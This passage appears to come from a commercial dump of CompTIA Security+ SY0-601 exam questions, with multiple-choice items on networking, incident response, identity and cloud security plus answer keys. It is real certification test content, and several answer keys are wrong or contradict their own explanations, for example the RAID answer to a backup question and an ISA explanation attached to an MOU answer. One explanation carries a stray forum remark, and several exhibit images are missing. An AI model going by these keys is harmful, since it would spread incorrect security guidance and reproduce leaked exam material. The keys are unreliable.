place. Logging in to the connected switch, the analyst sees the following in the ARP table:
Which of the following did the penetration tester MOST likely use?
A.
B.
C.
D.
ARP poisoning
MAC cloning
Man in the middle
Evil twin
Answer: B
QUESTION 579
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
200
A recent audit cited a risk involving numerous low-criticality vulnerabilities created by a web
application using a third-party library. The development staff state there are still customers using
the application even though it is end of life and it would be a substantial burden to update the
application for compatibility with more secure libraries. Which of the following would be the MOST
prudent course of action?
A.
B.
C.
D.
Accept the risk if there is a clear road map for timely decommission
Deny the risk due to the end-of-life status of the application.
Use containerization to segment the application from other applications to eliminate the risk
Outsource the application to a third-party developer group
Answer: C
Explanation:
You shouldn't have to take any risk at all if you can containerize the application. The goal of
containerization is to isolate an application to prevent malware, intruders, system resources or
other applications from interacting with the application - and any of its sensitive information secured by the container.
https://www.proofpoint.com/sites/default/files/pp-containerization-and-app-reputation.pdf
QUESTION 580
A Chief Information Security Officer (CISO) is evaluating the dangers involved in deploying a new
ERP system for the company. The CISO categorizes the system, selects the controls that apply
to the system, implements the controls, and then assesses the success of the controls before
authorizing the system. Which of the following is the CISO using to evaluate the environment for
this new ERP system?
A.
B.
C.
D.
The Diamond Model of Intrusion Analysis
CIS Critical Security Controls
NIST Risk Management Framework
ISO 27002
Answer: C
Explanation:
NIST RMF has a simple 7 step process:
1. Essential activities to prepare the organization to manage security and privacy risks
2. Categorize the system and information processed, stored, and transmitted based on an impact
analysis
3. Select the set of NIST SP 800-53 controls to protect the system based on risk assessment(s)
4. Implement the controls and document how controls are deployed
5. Assess to determine if the controls are in place, operating as intended, and producing the
desired results
6. Senior official makes a risk-based decision to authorize the system (to operate)
7. Continuously monitor control implementation and risks to the system.
The actions of the CISO correspond to that process.
QUESTION 581
During an investigation, the incident response team discovers that multiple administrator
accounts were suspected of being compromised. The host audit logs indicate a repeated bruteforce attack on a single administrator account followed by suspicious logins from unfamiliar
geographic locations. Which of the following data sources would be BEST to use to assess the
accounts impacted by this attack?
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
201
A.
B.
C.
D.
User behavior analytics
Dump files
Bandwidth monitors
Protocol analyzer output
Answer: A
Explanation:
User behavior analytics
User behavior analytics is a cybersecurity process about detection of insider threats, targeted
attacks, and financial fraud that tracks a system's users. UBA looks at patterns of human
behavior, and then analyzes them to detect anomalies that indicate potential threats.
QUESTION 582
During an incident, an EDR system detects an increase in the number of encrypted outbound
connections from multiple hosts. A firewall is also reporting an increase in outbound connections
that use random high ports. An analyst plans to review the correlated logs to find the source of
the incident. Which of the following tools will BEST assist the analyst?
A.
B.
C.
D.
A vulnerability scanner
A NGFW
The Windows Event Viewer
A SIEM
Answer: D
QUESTION 583
SIMULATION
An attack has occurred against a company.
INSTRUCTIONS
You have been tasked to do the following:
- Identify the type of attack that is occurring on the network by clicking on the attacker’s tablet and
reviewing the output. (Answer Area 1).
- Identify which compensating controls should be implemented on the assets, in order to reduce
the effectiveness of future attacks by dragging them to the correct server. (Answer area 2)
If at any time you would like to bring back the initial state of the simulation, please click the Reset
All button.
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
202
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
203
Answer:
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
204
QUESTION 584
A user's login credentials were recently compromised During the investigation, the security
analyst determined the user input credentials into a pop-up window when prompted to confirm the
username and password. However the trusted website does not use a pop-up for entering user
credentials. Which of the following attacks occurred?
A.
B.
C.
D.
Cross-site scripting
SOL injection
DNS poisoning
Certificate forgery
Answer: A
QUESTION 585
A routine audit of medical billing claims revealed that several claims were submitted without the
subscriber's knowledge. A review of the audit logs for the medical billing company's system
indicated a company employee downloaded customer records and adjusted the direct deposit
information to a personal bank account. Which of the following does this action describe?
A.
B.
C.
D.
Insider threat
Social engineering
Third-party risk
Data breach
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
205
Answer: A
Explanation:
Insider threat is the potential for an insider to use their authorized access or understanding of an
organization to harm that organization.
QUESTION 586
During a recent penetration test, the tester discovers large amounts of data were exfiltrated over
the course of 12 months via the Internet. The penetration tester stops the test to inform the client
of the findings. Which of the following should be the client's NEXT step to mitigate the issue?
A.
B.
C.
D.
Conduct a full vulnerability scan to identify possible vulnerabilities.
Perform containment on the critical servers and resources
Review the firewall and identify the source of the active connection.
Disconnect the entire infrastructure from the Internet
Answer: B
Explanation:
Perform containment on the critical servers and resources -> Isolation or containment is the first
thing to do after an incident has been discovered.
QUESTION 587
Which of the following should be monitored by threat intelligence researchers who search for
leaked credentials?
A.
B.
C.
D.
Common Weakness Enumeration
OSINT
Dark web
Vulnerability databases
Answer: C
Explanation:
https://www.hackers-arise.com/post/open-source-intelligence-osint-finding-breached-emailaddresses-passwords-and-other-credentials
QUESTION 588
Which of the following types of attacks is being attempted and how can it be mitigated?
A.
B.
C.
D.
XSS; implement a SIEM
CSRF; implement an IPS
Directory traversal: implement a WAF
SQL injection: implement an IDS
Answer: C
QUESTION 589
Which of the following control types is focused primarily on reducing risk before an incident
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
206
occurs?
A.
B.
C.
D.
Preventive
Deterrent
Corrective
Detective
Answer: A
Explanation:
A preventive control is designed to be implemented prior to a threat event and reduce and/or
avoid the likelihood and potential impact of a successful threat event.
QUESTION 590
Per company security policy, IT staff members are required to have separate credentials to
perform administrative functions using just-in-time permissions.
Which of the following solutions is the company Implementing?
A.
B.
C.
D.
Privileged access management
SSO
RADIUS
Attribute-based access control
Answer: A
QUESTION 591
A company Is planning to install a guest wireless network so visitors will be able to access the
Internet. The stakeholders want the network to be easy to connect to so time is not wasted during
meetings. The WAPs are configured so that power levels and antennas cover only the
conference rooms where visitors will attend meetings. Which of the following would BEST protect
the company's Internal wireless network against visitors accessing company resources?
A. Configure the guest wireless network to be on a separate VLAN from the company's internal
wireless network
B. Change the password for the guest wireless network every month.
C. Decrease the power levels of the access points for the guest wireless network.
D. Enable WPA2 using 802.1X for logging on to the guest wireless network.
Answer: A
QUESTION 592
Which of the following will Increase cryptographic security?
A.
B.
C.
D.
High data entropy
Algorithms that require less computing power
Longer key longevity
Hashing
Answer: A
Explanation:
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
207
Entropy is a measure of disorder. A plaintext will usually exhibit low entropy as it represents a
message in a human language or programming language or data structure. The plaintext must be
ordered for it to be intelligible to a person, computer processor, or database. One of the
requirements of a strong cryptographic algorithm is to produce a disordered ciphertext. Put
another way, the ciphertext must exhibit a high level of entropy. If any elements of order from the
plaintext persist, it will make the ciphertext vulnerable to cryptanalysis, and the algorithm can be
shown to be weak.
QUESTION 593
Which of the following components can be used to consolidate and forward inbound Interne!
traffic to multiple cloud environments though a single firewall?
A.
B.
C.
D.
Transit gateway
Cloud hot site
Edge computing
DNS sinkhole
Answer: A
Explanation:
VPC peering relationships can quickly become difficult to manage, especially if each VPC must
interconnect in a mesh-like structure. A transit gateway is a simpler means of managing these
interconnections. Essentially, a transit gateway is a virtual router that handles routing between the
subnets in each attached VPC and any attached VPN gateways (aws.amazon.com/transitgateway).
QUESTION 594
A recent security breach exploited software vulnerabilities in the firewall and within the network
management solution. Which of the following will MOST likely be used to identify when the
breach occurred through each device?
A.
B.
C.
D.
SIEM correlation dashboards
Firewall syslog event logs
Network management solution login audit logs
Bandwidth monitors and interface sensors
Answer: A
Explanation:
SIEM could tell when the breach occurred in firewall AND in network management solution.
QUESTION 595
The Chief Technology Officer of a local college would like visitors to utilize the school's WiFi but
must be able to associate potential malicious activity to a specific person.
Which of the following would BEST allow this objective to be met?
A.
B.
C.
D.
Requiring all new, on-site visitors to configure their devices to use WPS
Implementing a new SSID for every event hosted by the college that has visitors
Creating a unique PSK for every visitor when they arrive at the reception area
Deploying a captive portal to capture visitors' MAC addresses and names
Answer: D
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
208
QUESTION 596
Two organizations plan to collaborate on the evaluation of new SIEM solutions for their respective
companies. A combined effort from both organizations' SOC teams would speed up the effort.
Which of the following can be written to document this agreement?
A.
B.
C.
D.
MOU
ISA
SLA
NDA
Answer: A
Explanation:
A document that regulates security-relevant aspects of an intended connection between an
agency and an external system. It regulates the security interface between any two systems
operating under two different distinct authorities. It includes a variety of descriptive, technical,
procedural, and planning information. It is usually preceded by a formal MOA/MOU that defines
high- level roles and responsibilities in management of a cross-domain connection.
QUESTION 597
Which of the following employee roles is responsible for protecting an organization's collected
personal information?
A.
B.
C.
D.
CTO
DPO
CEO
DBA
Answer: B
Explanation:
A data protection officer (DPO) is an enterprise security leadership role required by the General
Data Protection Regulation (GDPR). Data protection officers are responsible for overseeing a
company's data protection strategy and its implementation to ensure compliance with GDPR
requirements.
QUESTION 598
A malware attack has corrupted 30TB of company data across all file servers. A systems
administrator identifies the malware and contains the issue, but the data is unrecoverable. The
administrator is not concerned about the data loss because the company has a system in place
that will allow users to access the data that was backed up last night.
Which of the following resiliency techniques did the administrator MOST likely use to prevent
impacts to business operations after an attack?
A.
B.
C.
D.
Tape backups
Replication
RAID
Cloud storage
Answer: C
QUESTION 599
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
209
A cybersecurity administrator needs to implement a Layer 7 security control on a network and
block potential attacks. Which of the following can block an attack at Layer 7? (Choose two.)
A.
B.
C.
D.
E.
F.
G.
HIDS
NIPS
HSM
WAF
NAC
NIDS
Stateless firewall
Answer: BD
Explanation:
A WAF or web application firewall helps protect web applications by filtering and monitoring HTTP
traffic between a web application and the Internet. It typically protects web applications from
attacks such as cross-site forgery, cross-site-scripting (XSS), file inclusion, and SQL injection,
among others. A WAF is a protocol layer 7 defense (in the OSI model).
A network intrusion protection system (NIPS) is an umbrella term for a combination of hardware
and software systems that protect computer networks from unauthorized access and malicious
activity. NIPS consists of NIDS and IPS. WAF is a firewall. NIPS can operate up to layer 7 by
passing or allowing traffic.
QUESTION 600
An organization is moving away from the use of client-side and server-side certificates for EAR.
The company would like for the new EAP solution to have the ability to detect rogue access
points. Which of the following would accomplish these requirements?
A.
B.
C.
D.
PEAP
EAP-FAST
EAP-TLS
EAP-TTLS
Answer: B
QUESTION 601
An amusement park is implementing a biometric system that validates customers' fingerprints to
ensure they are not sharing tickets. The park's owner values customers above all and would
prefer customers' convenience over security. For this reason, which of the following features
should the security team prioritize FIRST?
A.
B.
C.
D.
Low FAR
Low efficacy
Low FRR
Low CER
Answer: C
Explanation:
There are two main metrics that are used to determine the performance of biometrics:
1. FAR (False Acceptance Rate)
2. FRR (False Rejection Rate)
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
210
False Acceptance Rate (FAR) is a metric for bio-metric performance that determines the number
of instances where unauthorized persons were incorrectly authorized. False Rejection Rate
(FRR) is a metric that determines the number of instances where an authorized person are
incorrectly rejected.
If the emphasis is security, then making sure the False Acceptance Rate is low as a low FAR rate
means a lower possibility for someone to be authorized who shouldn't. If the emphasis is
convenience, then you'd want to make sure the False Rejection Rate is low as a low FRR means
a lower possibility for someone to be rejected who should be authorized.
QUESTION 602
A security proposal was set up to track requests for remote access by creating a baseline of the
users' common sign-in properties. When a baseline deviation is detected, an MFA challenge will
be triggered. Which of the following should be configured in order to deploy the proposal?
A.
B.
C.
D.
Context-aware authentication
Simultaneous authentication of equals
Extensive authentication protocol
Agentless network access control
Answer: A
Explanation:
Context-Aware authentication - An access control scheme that verifies an object's identity based
on various environmental factors, like time, location, and behavior.
QUESTION 603
A company recently experienced a significant data loss when proprietary Information was leaked
to a competitor. The company took special precautions by using proper labels; however, email
filter logs do not have any record of the incident. An Investigation confirmed the corporate
network was not breached, but documents were downloaded from an employee's COPE tablet
and passed to the competitor via cloud storage. Which of the following is the BEST remediation
for this data leak?
A.
B.
C.
D.
User training
CASB
MDM
DLP
Answer: D
QUESTION 604
The Chief Information Security Officer wants to prevent exfiltration of sensitive information from
employee cell phones when using public USB power charging stations. Which of the following
would be the BEST solution to implement?
A.
B.
C.
D.
DLP
USB data blocker
USB OTG
Disabling USB ports
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
211
Answer: B
Explanation:
Malicious USB charging cables and plugs are also a widespread problem. As with card skimming,
a device may be placed over a public charging port at airports and other transit locations. A USB
data blocker can provide mitigation against these juice- jacking attacks by preventing any sort of
data transfer when the smartphone or laptop is connected to a charge point.
QUESTION 605
An organization is planning to open other data centers to sustain operations in the event of a
natural disaster. Which of the following considerations would BEST support the organization's
resiliency?
A.
B.
C.
D.
Geographic dispersal
Generator power
Fire suppression
Facility automation
Answer: A
Explanation:
Placing that datacenter far away, maybe in another country can help protect against disasters like
an earthquake.
QUESTION 606
A security analyst has been asked by the Chief Information Security Officer to:
- develop a secure method of providing centralized management of
infrastructure
- reduce the need to constantly replace aging end user machines
- provide a consistent user desktop experience
Which of the following BEST meets these requirements?
A.
B.
C.
D.
BYOD
Mobile device management
VDI
Containerization
Answer: C
Explanation:
Virtual Desktop Infrastructure (VDI) is a technology that refers to the use of virtual machines to
provide and manage virtual desktops. VDI hosts desktop environments on a centralized server
and deploys them to end-users on request.
QUESTION 607
Historically, a company has had issues with users plugging in personally owned removable media
devices into corporate computers. As a result, the threat of malware incidents is almost constant.
Which of the following would BEST help prevent the malware from being installed on the
computers?
A. AUP
B. NGFW
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
212
C. DLP
D. EDR
Answer: D
QUESTION 608
A company wants the ability to restrict web access and monitor the websites that employees visit.
Which of the following would BEST meet these requirements?
A.
B.
C.
D.
internet proxy
VPN
WAF
Firewall
Answer: A
QUESTION 609
A security analyst has been tasked with creating a new WiFi network for the company. The
requirements received by the analyst are as follows:
- Must be able to differentiate between users connected to WiFi
- The encryption keys need to change routinely without interrupting the
users or forcing reauthentication
- Must be able to integrate with RADIUS
- Must not have any open SSIDs
Which of the following options BEST accommodates these requirements?
A.
B.
C.
D.
WPA2-Enterprise
WPA3-PSK
802.11n
WPS
Answer: A
Explanation:
Deploying WPA2-Enterprise requires a RADIUS server, which handles the task of authenticating
network users access. The actual authentication process is based on the 802.1x policy and
comes in several different systems labelled EAP. Because each device is authenticated before it
connects, a personal, encrypted tunnel is effectively created between the device and the network.
QUESTION 610
An application owner reports suspicious activity on an internal financial application from various
internal users within the past 14 days. A security analyst notices the following:
- Financial transactions were occurring during irregular time frames and outside of business hours
by unauthorized users.
- Internal users in question were changing their passwords frequently during that time period.
- A jump box that several domain administrator users use to connect to remote devices was
recently compromised.
- The authentication method used in the environment is NTLM.
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
213
Which of the following types of attacks is MOST likely being used to gain unauthorized access?
A.
B.
C.
D.
Pass-the-hash
Brute-force
Directory traversal
Replay
Answer: A
QUESTION 611
A systems administrator is troubleshooting a server's connection to an internal web server. The
administrator needs to determine the correct ports to use. Which of the following tools BEST
shows which ports on the web server are in a listening state?
A.
B.
C.
D.
ipconfig
ssh
Ping
Netstat
Answer: D
Explanation:
ipconfig - shows you the IP information for your current machine
ssh - this is used for file transfers (ftp etc etc)
ping - this is just to reach out to a node to get a response from it
netstat - shows listening ports
QUESTION 612
Which of the following describes the continuous delivery software development methodology?
A.
B.
C.
D.
Waterfall
Spiral
V-shaped
Agile
Answer: D
Explanation:
Agile methodology is a way to manage a project by breaking it up into several phases. It involves
constant collaboration with stakeholders and continuous improvement at every stage. Once the
work begins, teams cycle through a process of planning, executing, and evaluating.
QUESTION 613
An attacker was eavesdropping on a user who was shopping online. The attacker was able to
spoof the IP address associated with the shopping site. Later, the user received an email
regarding the credit card statement with unusual purchases.
Which of the following attacks took place?
A.
B.
C.
D.
On-path attack
Protocol poisoning
Domain hijacking
Bluejacking
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
214
Answer: A
Explanation:
An On-path attack(Man in the Middle) occurs when an attacker place themselves between two
devices (often a web browser and a web server) and intercept or modify communications
between the two.
In this question, the attacker was eavesdropping on the connection which means they placed
themselves between the user and the shopping site and intercepted the communication.
The attacker had likely captured credit card information or account information from the site to be
able to make the purchases.
QUESTION 614
A company needs to validate its updated incident response plan using a real-world scenario that
will test decision points and relevant incident response actions without interrupting daily
operations. Which of the following would BEST meet the company's requirements?
A.
B.
C.
D.
Red-team exercise
Capture-the-flag exercise
Tabletop exercise
Phishing exercise
Answer: C
QUESTION 615
A company is looking to migrate some servers to the cloud to minimize its technology footprint.
The company has 100 databases that are on premises. Which of the following solutions will
require the LEAST management and support from the company?
A.
B.
C.
D.
SaaS
IaaS
PaaS
SDN
Answer: A
Explanation:
SaaS client has the lowest shared responsibilities to take care of.
QUESTION 616
All security analysts workstations at a company have network access to a critical server VLAN.
The information security manager wants to further enhance the controls by requiring that all
access to the secure VLAN be authorized only from a given single location.
Which of the following will the information security manager MOST likely implement?
A.
B.
C.
D.
A forward proxy server
A jump server
A reverse proxy server
A stateful firewall server
Answer: A
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
215
QUESTION 617
The technology department at a large global company is expanding its Wi-Fi network
infrastructure at the headquarters building. Which of the following should be closely coordinated
between the technology, cybersecurity, and physical security departments?
A.
B.
C.
D.
Authentication protocol
Encryption type
WAP placement
VPN configuration
Answer: C
Explanation:
It's the only physical device listed that'll meet the physical security requirement.
QUESTION 618
Which of the following BEST reduces the security risks introduced when running systems that
have expired vendor support and lack an immediate replacement?
A.
B.
C.
D.
Implement proper network access restrictions
Initiate a bug bounty program
Classify the system as shadow IT.
Increase the frequency of vulnerability scans
Answer: A
QUESTION 619
An organization wants to implement a biometric system with the highest likelihood that an
unauthorized user will be denied access.
Which of the following should the organization use to compare biometric solutions?
A.
B.
C.
D.
E.
FRR
Difficulty of use
Cost
FAR
CER
Answer: D
Explanation:
Since the question is looking for the highest likelihood that an unauthorized user will be denied
access. The organization will side with the biometric solution that, in this case, would provide the
most security.
The False Acceptance Rate (FAR) metric determines the number of instances where
unauthorized persons were incorrectly authorized.
Making sure the False Acceptance Rate is low means a lower possibility for someone to be
authorized who shouldn't. This would provide the security the organization is looking for.
The Crossover Error Rate(CER) describes the point where the FRR and FAR are equal showing
the accuracy of a biometric system. The accuracy/sensitivity of biometric system is not what the
organization is concerned with, only the security the solution provides.
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
216
QUESTION 620
Which of the following environments minimizes end user disruption and is MOST likely to be used
to assess the impacts of any database migrations or major system changes by using the final
version of the code in an operationally representative environment?
A.
B.
C.
D.
Staging
Test
Production
Development
Answer: A
Explanation:
A staging environment is used to validate code that will be deployed. I have seen you providing
answers with no context behind them and being wrong. You need to stop that.
QUESTION 621
A database administrator wants to grant access to an application that will be reading and writing
data to a database. The database is shared by other applications also used by the finance
department.
Which of the following account types Is MOST appropriate for this purpose?
A.
B.
C.
D.
Service
Shared
Generic
Admin
Answer: A
Explanation:
Service accounts are a special type of non-human privileged account used to execute
applications and run automated services, virtual machine instances, and other processes. Service
accounts can be privileged local or domain accounts, and in some cases, they may have domain
administrative privileges.
QUESTION 622
A junior security analyst is conducting an analysis after passwords were changed on multiple
accounts without users' interaction. The SIEM have multiple login entries with the following text:
Which of the following is the MOST likely attack conducted on the environment?
A.
B.
C.
D.
Malicious script
Privilege escalation
Domain hijacking
DNS poisoning
Answer: A
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
217
Explanation:
A-Malicious scripts are fragments of code that have been modified by threat actors for nefarious
purposes. Cyber threat actors hide them in legitimate websites, third-party scripts, and other
places to compromise the security of client-side web applications and webpages.
QUESTION 623
A company is receiving emails with links to phishing sites that look very similar to the company's
own website address and content.
Which of the following is the BEST way for the company to mitigate this attack?
A.
B.
C.
D.
Create a honeynet to trap attackers who access the VPN with credentials obtained by phishing.
Generate a list of domains similar to the company's own and implement a DNS sinkhole for each.
Disable POP and IMAP on all Internet-facing email servers and implement SMTPS.
Use an automated tool to flood the phishing websites with fake usernames and passwords.
Answer: B
Explanation:
DNS sinkhole prevents users from entering the site if they have a sinkhole for the domain name.
So making a list of fake websites domain name and making a sinkhole will prevent access to
these website if a user tried to search for it on accident.
QUESTION 624
As part of a security compliance assessment, an auditor performs automated vulnerability scans.
In addition, which of the following should the auditor do to complete the assessment?
A.
B.
C.
D.
User behavior analysis
Packet captures
Configuration reviews
Log analysis
Answer: D
Explanation:
Configuration review is part of the vulnerability scan. Vulnerability scan can produce false
positives, which is why its effectiveness can be enhanced by log reviews to see whether an
identified vulnerability is in fact valid.
QUESTION 625
After multiple on premises security solutions were migrated to the cloud, the incident response
time increased. The analyst are spending a long time to trace information on different cloud
consoles and correlating data in different formats.
Which of the following can be used to optimize the incident response time?
A.
B.
C.
D.
CASB
VPC
SWG
CMS
Answer: A
Explanation:
CASB provides critical security tool that help control, monitoring, compliance management, data
security and threat protection that will optimize incident response time.
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
218
QUESTION 626
Which of the following is the MOST relevant security check to be performed before embedding
third-parry libraries in developed code?
A. Check to see if the third party has resources to create dedicated development and staging
environments.
B. Verify the number of companies that downloaded the third-party code and the number of
contributions on the code repository.
C. Assess existing vulnerabilities affecting the third-parry code and the remediation efficiency of the
libraries' developers.
D. Read multiple penetration-testing reports for environments running software that reused the
library.
Answer: C
Explanation:
What to be done to best prevent issues in third-party code?
Establish a baseline and process for every third-party software that is introduced into the
organisation, including performing a risk assessment to establish the risk associated with
implementing a certain piece of code.
QUESTION 627
Certain users are reporting their accounts are being used to send unauthorized emails and
conduct suspicious activities. After further investigation, a security analyst notices the following:
- All users share workstations throughout the day.
- Endpoint protection was disabled on several workstations throughout
the network.
- Travel times on logins from the affected users are impossible.
- Sensitive data is being uploaded to external sites.
- All user account passwords were forced to be reset and the issue
continued.
Which of the following attacks is being used to compromise the user accounts?
A.
B.
C.
D.
Brute-force
Keylogger
Dictionary
Rainbow
Answer: B
Explanation:
A Keylogger would be the reason of why even after resetting the passwords the issue persisted.
There is no information about the password itself that would allow to determine if any brute force
attack method is being used.
QUESTION 628
Which of the following is the MOST likely reason for securing an air-gapped laboratory HVAC
system?
A. To avoid data leakage
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
219
B. To protect surveillance logs
C. To ensure availability
D. To restrict remote access
Answer: C
Explanation:
A HVAC System is a important and critical component of a Datacenter. If this fails, the systems
could overheat and therefor crash which ends in loss of availability and in the worst case also
data loss.
QUESTION 629
An application developer accidentally uploaded a company's code-signing certificate private key
to a public web server. The company is concerned about malicious use of its certificate.
Which of the following should the company do FIRST?
A.
B.
C.
D.
Delete the private key from the repository-.
Verify the public key is not exposed as well.
Update the DLP solution to check for private keys.
Revoke the code-signing certificate.
Answer: D
Explanation:
We need to revoke the code-signing certificate as this is the most secure way to ensure that the
comprised key won’t be used by attackers. Usually there are bots crawling all over repos
searching this kind of human errors.
QUESTION 630
A security analyst is investigating some users who are being redirected to a fake website that
resembles www.comptia.org. The following output was found on the naming server of the
organization:
Which of the following attacks has taken place?
A. Domain reputation
B. Domain hijacking
C. Disassociation
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
220
D. DNS poisoning
Answer: D
Explanation:
DNS server cache poisoning aims to corrupt the records held by the DNS server itself. This can
be accomplished by performing DoS against the server that holds the authorized records for the
domain, and then spoofing replies to requests from other name servers. Another attack involves
getting the victim name server to respond to a recursive query from the attacking host. A
recursive query compels the DNS server to query the authoritative server for the answer on
behalf of the client.
QUESTION 631
The Chief Information Security Officer (CISO) requested a report on potential areas of
improvement following a security incident.
Which of the following incident response processes is the CISO requesting?
A.
B.
C.
D.
E.
Lessons learned
Preparation
Detection
Containment
Root cause analysis
Answer: A
Explanation:
Lessons learned is the final step in the incident response where the organization reviews their
incident response and prepare for a future attack. This is where you understand how/why an
incident occurred, identify any weaknesses in your organization's practices, any positive elements
or practices that went well, and things that could be done to prepare for a future incident.
Incident Response - A set of instructions or procedures an IT staff follows to detect, respond to,
recover and recover from a security incident.
Phases in the Incident Response Plan:
1. Preparation: The organization plans out how they will respond to attack, this can involve:
2. Identification: Detecting and determining whether an incident has occurred.
3. Containment: Once a threat has been identified, the organization must limit or prevent any
further damage.
4. Eradication: The removal of the threat
5. Recovery: Restoring systems affected by the incident
6. Lessons Learned: Where the organization reviews their incident response and prepare for a
future attack
QUESTION 632
While reviewing an alert that shows a malicious request on one web application, a cybersecurity
analyst is alerted to a subsequent token reuse moments later on a different service using the
same single sign-on method.
Which of the following would BEST detect a malicious actor?
A.
B.
C.
D.
Utilizing SIEM correlation engines
Deploying Netflow at the network border
Disabling session tokens for all sites
Deploying a WAF for the web server
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
221
Answer: A
Explanation:
The initial compromise was a malicious request on a web server. Moments later the token
created with SSO was used on another service, the question does not specify what type of
service.
Deploying a WAF on the web server will detect the attacker but only on that server. If the attacker
issues the same malicious request to get another SSO token correlating that event with using that
SSO token in other services would allows to detect the malicious activity.
QUESTION 633
An administrator is experiencing issues when trying to upload a support file to a vendor. A pop-up
message reveals that a payment card number was found in the file, and the file upload was
blocked.
Which of the following controls is most likely causing this issue and should be checked FIRST?
A.
B.
C.
D.
E.
DLP
Firewall rule
Content filter
MDM
Application whitelist
Answer: A
Explanation:
DLP - Data Loss Prevention uses exact data matching or regex matching - in this case a regex
rule for detecting credit card numbers could be in place that is actively blocking the upload of the
document - Regex for detecting and Amex Card: ^3[47][0-9]{13}$
QUESTION 634
After returning from a conference, a user's laptop has been operating slower than normal and
overheating, and the fans have been running constantly. During the diagnosis process, an
unknown piece of hardware is found connected to the laptop's motherboard.
Which of the following attack vectors was exploited to install the hardware?
A.
B.
C.
D.
Removable media
Spear phishing
Supply chain
Direct access
Answer: D
Explanation:
In a direct-access attack, a person gains physical access to a computer and performs malicious
actions including installing different types of devices to compromise security, like operating
system modifications, software worms, keyloggers or covert listening devices.
A direct access threat vector is when the attacker is able to directly control the targeted system.
This can take place through direct physical contact with the system’s keyboard or may occur
through a remote access connection.
QUESTION 635
Which of the following policies establishes rules to measure third-party work tasks and ensure
deliverables are provided within a specific time line?
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
222
A.
B.
C.
D.
SLA
MOU
AUP
NDA
Answer: A
QUESTION 636
A customer has reported that an organization's website displayed an image of a smiley (ace
rather than the expected web page for a short time two days earlier.
A security analyst reviews log tries and sees the following around the lime of the incident:
Which of the following is MOST likely occurring?
A.
B.
C.
D.
Invalid trust chain
Domain hijacking
DNS poisoning
URL redirection
Answer: C
QUESTION 637
Which of the following in a forensic investigation should be priorities based on the order of
volatility? (Choose two.)
A.
B.
C.
D.
E.
F.
Page files
Event logs
RAM
Cache
Stored files
HDD
Answer: CD
Explanation:
The IETF and the Order of Volatility
The Internet Engineering Task Force (IETF) released a document titled, Guidelines for Evidence
Collection and Archiving. It is also known as RFC 3227. This document explains that the
collection of evidence should start with the most volatile item and end with the least volatile item.
So, according to the IETF, the Order of Volatility is as follows:
1. Registers, Cache
2. Routing Table, ARP Cache, Process Table, Kernel Statistics, Memory
3. Temporary File Systems
4. Disk
5. Remote Logging and Monitoring Data that is Relevant to the System in Question
6. Physical Configuration, Network Topology
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
223
7. Archival Media
QUESTION 638
A security forensics analyst is examining a virtual server. The analyst wants to preserve the
present state of the virtual server, including memory contents.
Which of the following backup types should be used?
A.
B.
C.
D.
E.
Snapshot
Differential
Cloud
Full
Incremental
Answer: A
Explanation:
A snapshot preserves the state and data of a virtual machine at a specific point in time.
The state includes the virtual machine’s power state (for example, powered-on, powered-off,
suspended).
The data includes all of the files that make up the virtual machine. This includes disks, memory,
and other devices, such as virtual network interface cards.
A virtual machine provides several operations for creating and managing snapshots and snapshot
chains. These operations let you create snapshots, revert to any snapshot in the chain, and
remove snapshots. You can create extensive snapshot trees.
QUESTION 639
A security manager needs to assess the security posture of one of the organization's vendors.
The contract with the vendor does not allow for auditing of the vendor's security controls.
Which of the following should the manager request to complete the assessment?
A.
B.
C.
D.
A service-level agreement
A business partnership agreement
A SOC 2 Type 2 report
A memorandum of understanding
Answer: C
QUESTION 640
A security monitoring company offers a service that alerts ifs customers if their credit cards have
been stolen. Which of the following is the MOST likely source of this information?
A.
B.
C.
D.
E.
STIX
The dark web
TAXII
Social media
PCI
Answer: B
QUESTION 641
Which of the following would MOST likely be identified by a credentialed scan but would be
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
224
missed by an uncredentialed scan?
A.
B.
C.
D.
Vulnerabilities with a CVSS score greater than 6.9.
Critical infrastructure vulnerabilities on non-IP protocols.
CVEs related to non-Microsoft systems such as printers and switches.
Missing patches for third-party software on Windows workstations and servers.
Answer: D
Explanation:
A non-credentialed scan will monitor the network and see any vulnerabilities that an attacker
would easily find; we should fix the vulnerabilities found with a non-credentialed scan first, as this
is what the hacker will see when they enter your network. For example, an administrator runs a
non- credentialed scan on the network and finds that there are three missing patches. The scan
does not provide many details on these missing patches. The administrator installs the missing
patches to keep the systems up to date as they can only operate on the information produced for
them.
QUESTION 642
Multiple business accounts were compromised a few days after a public website had its
